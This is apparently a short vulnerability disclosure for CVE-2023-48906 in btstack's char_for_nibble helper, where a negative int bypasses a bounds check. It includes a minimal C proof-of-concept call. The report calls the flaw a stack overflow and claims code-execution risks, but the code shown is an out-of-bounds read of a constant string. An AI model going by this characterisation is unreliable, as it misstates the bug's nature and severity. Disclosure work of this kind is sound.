CVE-2023-48906

github：https://github.com/bluekitchen/btstack/issues/546

In the btstack source code, we can find an interesting piece of code.

char char_for_nibble(int nibble){

    static const char * char_to_nibble = "0123456789ABCDEF";

    if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }
}

static inline char char_for_high_nibble(int value){
    return char_for_nibble((value >> 4) & 0x0f);
}

static inline char char_for_low_nibble(int value){
    return char_for_nibble(value & 0x0f);
}

The parameter "value" passed to the function "char_for_high_nibble" in the btstack source code is of type int. However, after the XOR operation, it is possible for "value" to become a negative number. In this case, the if statement inside the "char_for_nibble" function will not function as expected.

 if (nibble < 16){
        return char_to_nibble[nibble];
    } else {
        return '?';
    }

As a result, we can access additional content of the char_to_nibble array, causing a stack overflow.
Here is the POC code.

#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <math.h>
typedef uint8_t   u8;   
typedef uint16_t  u16;  
typedef uint32_t  u32;  
typedef uint64_t  u64;
typedef unsigned int usize;
typedef int8_t  i8;
typedef int16_t i16;
typedef int32_t i32;
typedef int64_t i64;
typedef int isize;
typedef float f32;
typedef double f64;
int main() {
    i32 v0 = -2147483643; // nibble
    i8 v1 = char_for_nibble(v0); // $target
}

The hazards of stack overflow include the following aspects:

Code Execution Control: A local stack overflow vulnerability can allow an attacker to manipulate the program's execution flow by carefully crafting malicious input. By overflowing the stack and overwriting critical control data, such as function return addresses, an attacker can gain control over the program's execution. This control can be used to redirect the program's flow to malicious code, enabling unauthorized operations and exploitation of other security vulnerabilities.

Denial of Service (DoS): Stack overflow vulnerabilities can also lead to denial of service attacks, causing the target system to crash or become unresponsive. By sending specific malicious input, an attacker can trigger a stack overflow, causing the program to crash or enter an infinite loop, depleting system resources and rendering the system unresponsive.